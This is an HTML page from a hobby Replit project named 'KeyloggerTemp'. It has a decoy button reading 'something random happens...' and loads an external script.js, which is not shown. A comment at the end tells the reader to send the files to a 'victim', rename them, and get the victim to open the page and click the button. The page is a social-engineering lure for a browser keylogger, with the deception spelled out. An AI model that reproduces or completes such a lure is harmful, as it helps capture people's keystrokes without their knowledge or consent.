<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>replit</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
  KeyloggerTemp | @wWaterRB Made This! //
  <button style="border: 2px solid black;">something random happens...</button> 
  <!--
  This script places a badge on your repl's full-browser view back to your repl's cover
  page. Try various colors for the theme: dark, light, red, orange, yellow, lime, green,
  teal, blue, blurple, magenta, pink!
  -->
  <script src="https://replit.com/public/js/replit-badge-v2.js" theme="dark" position="bottom-right"></script>
  <script src="script.js"></script>
</body>
</html>

<!-- send the .html .css .js files to your victim and tell em to open up html and click button to your victims and rename it.-->
<!--btw this wuz made w replit-->